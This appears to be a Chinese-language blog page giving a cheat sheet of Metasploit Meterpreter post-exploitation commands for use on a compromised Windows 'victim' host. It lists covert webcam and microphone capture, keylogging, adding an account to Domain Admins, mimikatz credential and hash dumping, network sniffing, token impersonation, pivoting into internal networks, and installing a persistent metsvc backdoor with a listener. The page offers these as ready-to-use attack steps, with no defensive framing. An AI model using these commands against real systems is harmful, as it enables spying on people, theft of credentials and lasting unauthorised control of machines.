<h3 id="基本操作命令"><a href="#基本操作命令" class="headerlink" title="基本操作命令"></a>基本操作命令</h3><pre><code><hanla></hanla>cat c:\boot.ini#查看文件内容,<hanla></hanla>文件必须存在
del c:\boot.ini #删除指定的文件
upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上，如
upload  setup.exe C:\\windows\\system32\
download nimeia.txt /root/Desktop/   # 下载文件到本机上如：
download C:\\boot.ini /root/
edit c:\boot.ini  # 编辑文件
getwd#打印工作目录
cd#更改本地目录
ls#列出在当前目录中的文件列表


pwd#输出工作目录
cd c:\\ #进入目录文件下
rm file #删除文件
mkdir dier #在受害者系统上的创建目录
rmdir#受害者系统上删除目录
dir#列出目标主机的文件和文件夹信息
mv#修改目标主机上的文件名
search -d d:\\www -f web.config #search 文件，如
search  -d c:\\  -f *.doc
run vnc   查看桌面

run  getgui  -e   开启目标主机远程桌面
sysinfo   命令为显示远程主机的系统信息
execute  -f notepad.exe  打开记事本
execute -f calc.exe  打开计算器

execute -h  显示帮助信息。-f<hanla></hanla>为执行要运行的命令
如果希望隐藏后台执行，加参数-H
execute  -H -f notepad.exe 
</code></pre>
<h3 id="摄像头命令"><a href="#摄像头命令" class="headerlink" title="摄像头命令"></a>摄像头命令</h3><pre><code><hanla></hanla>record_mic  音频录制
webcam_chat  查看摄像头接口
webcam_list  #查看摄像头列表
webcam_stream #摄像头视频获取
</code></pre>
<h3 id="端口转发"><a href="#端口转发" class="headerlink" title="端口转发"></a>端口转发</h3><pre><code><hanla></hanla>portfwd -h
用法：portfwd [-h] [add | delete | list | flush] [args]
选项：
    
-L <opt><hanla></hanla>要监听的本地主机（可选）
    
-h<hanla></hanla>帮助横幅
   
 -l <opt><hanla></hanla>要监听的本地端口
   
 -p <opt><hanla></hanla>连接到的远程端口
    
 -r <opt><hanla></hanla>要连接到的远程主机
portfwd  add -l 4444 -p 3389 -r 192.168.1.102 # 端口转发,<hanla></hanla>本机监听<hanla></hanla>4444,<hanla></hanla>把目标机<hanla></hanla>3389<hanla></hanla>转到本机<hanla></hanla>4444

rdesktop -u Administrator -p bk#123 127.0.0.1:4444 #使用<hanla></hanla>rdesktop<hanla></hanla>来连接桌面，-u 用户名 -p 密码
rdesktop 127.1.1.0:4444 #需要输入用户名和密码远程连接
</opt></opt></opt></opt></code></pre>
<h3 id="shell网络环境"><a href="#shell网络环境" class="headerlink" title="shell网络环境"></a><hanla></hanla>shell<hanla></hanla>网络环境</h3><pre><code><hanla></hanla>meterpreter&gt;run get_local_subnets
添加一条通向目标服务器内网的路由
meterpreter&gt;run autoroute -s 100.0.0.0/8   #(根据目标内网网络而定)
查看路由设置：
meterpreter&gt;run autoroute –p
一般来说，在<hanla></hanla>meterpreter<hanla></hanla>中设置路由便可以达到通往其内网的目的。然而有些时候还是会失败，
这时我们可以<hanla></hanla>background<hanla></hanla>返回<hanla></hanla>msf&gt;，查看下外面的路由情况
route print
如果发现没有路由信息，说明<hanla></hanla>meterpreter shell<hanla></hanla>设置的路由并没有生效，我们可以在<hanla></hanla>msf<hanla></hanla>中添加路由。
msf&gt;route add 10.0.0.0 255.0.0.0 1
说明：1<hanla></hanla>表示<hanla></hanla>session 1，攻击机如果要去访问<hanla></hanla>10.0.0.0/8<hanla></hanla>网段的资源，其下一跳是<hanla></hanla>session1，
至于什么是下一条这里不多说了，反正就是目前攻击机可以访问内网资源了。
</code></pre>
<h3 id="键盘记录"><a href="#键盘记录" class="headerlink" title="键盘记录"></a>键盘记录</h3><pre><code><hanla></hanla>keyscan_start：开启键盘记录功能

keyscan_dump：显示捕捉到的键盘记录信息

keyscan_stop：停止键盘记录

add_user username password -h ip    #在远程目标主机上添加一个用户

add_group_user "Domain Admins" username -h ip    #将用户添加到目标主机的域管理员组中
</code></pre>
<h3 id="hash获取"><a href="#hash获取" class="headerlink" title="hash获取"></a><hanla></hanla>hash<hanla></hanla>获取</h3><pre><code><hanla></hanla>meterpreter &gt; load mimikatz  #加载<hanla></hanla>mimikatz
meterpreter &gt; msv #获取<hanla></hanla>hash<hanla></hanla>值
meterpreter &gt; kerberos #获取明文
meterpreter &gt;ssp   #获取明文信息
meterpreter &gt; wdigest #获取系统账户信
meterpreter &gt;mimikatz_command -f a::   #必须要以错误的模块来让正确的模块显示
meterpreter &gt;mimikatz_command -f hash::   #获取目标 hash
meterpreter &gt; mimikatz_command -f samdump::hashes
meterpreter &gt; mimikatz_command -f sekurlsa::searchPa
run post/windows/gather/smart_hashdump
</code></pre>
<h3 id="抓包嗅探"><a href="#抓包嗅探" class="headerlink" title="抓包嗅探"></a>抓包嗅探</h3><pre><code><hanla></hanla>use sniffer # 加载嗅探模块
sniffer_interfaces #列出目标主机所有开放的网络接口
sniffer_start 2 #获取正在实施嗅探网络接口的统计数据
sniffer_dump 2 /tmp/test2.cap #在目标主机上针对特定范围的数据包缓冲区启动嗅探
sniffer_stop  2   #停止嗅探

对抓取的包进行解包：
use auxiliary/sniffer/psnuffle
set pcapfile 1.cap
run
wireshark，加载这个<hanla></hanla>/tmp/xpsp1.cap 也可
</code></pre>
<h3 id="盗取令牌"><a href="#盗取令牌" class="headerlink" title="盗取令牌"></a>盗取令牌</h3><pre><code><hanla></hanla>meterpreter &gt;use incognito&nbsp;&nbsp;&nbsp; 加载<hanla></hanla>incoginto<hanla></hanla>功能（用来盗窃目标主机的令牌或是假冒用户)
meterpreter &gt;list_tokens -u&nbsp;&nbsp;&nbsp; 列出目标主机用户的可用令牌
meterpreter &gt;list_tokens -g&nbsp;&nbsp;&nbsp; 列出目标主机用户组的可用令牌
meterpreter &gt;impersonate_token DOMAIN_NAME\\USERNAME&nbsp;&nbsp;&nbsp; 假冒目标主机上的可用令牌,<hanla></hanla>如
meterpreter &gt; impersonate_token QLWEB\\Administrato
</code></pre>
<h3 id="持久控制服务器"><a href="#持久控制服务器" class="headerlink" title="持久控制服务器"></a>持久控制服务器</h3><pre><code>前提条件服务器系统可以
run metsvc 安装后门

msfconsole
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 192.168.2.131
run
</code></pre>

    </div>

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <div id="comment">
        <div id="gitalk-container">
        </div>
    </div>
    
</div>
                     
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © 2018 - 2021 Hongxiaodou
            <span class="footer-icon">
                <a-icon type="flag" theme="filled"></a-icon></span>
            @hongxiaodou
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> &amp; <a target="_blank" rel="noopener" href="https://github.com/korilin/hexo-theme-particle">Particle Theme</a></div>
        
    </div>

</footer>

<script src="/js/highlight.min.js"></script>
<script src="/js/particle.js"></script>
                </div>
            </div>
        </transition>
    </div>

    <script>
    new Vue({
        el: "#layout",
        data: {
            show_page: false,
            onload_menu: false,
            menu_show: false,
            card_top: 100
        },
        created: function () {
            var that = this
            window.onload = function () {
                that.show_page = true
                document.getElementById("loadcontent").style.opacity = 0
                setTimeout(function () {
                    document.getElementById("loadleft").style.width = 0
                    document.getElementById("loadright").style.width = 0
                }, 300)
                setTimeout(function () {
                    document.getElementById("loading").style = "display:none"
                }, 600)
            }
        },
        mounted: function () {
            var that = this
            window.addEventListener('scroll', function (e) {
                that.menu_show = false
            })
        },
        methods: {
            home_click: function () {
                window.scrollTo({
                    top: window.innerHeight - 80,
                    behavior: "smooth",
                });
            }
        }
    })
</script>

<script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script>
    const gitalk = new Gitalk({
        clientID: '',
        clientSecret: '',
        repo: 'hexo-theme-particle',      // The repository of store comments,
        owner: 'korilin',
        admin: ['korilin'],
        language: 'zh-CN',
        id: location.pathname,      // Ensure uniqueness and length less than 50
        distractionFreeMode: true  // Facebook-like distraction free mode
    })
    gitalk.render('gitalk-container')
</script>



</body></html>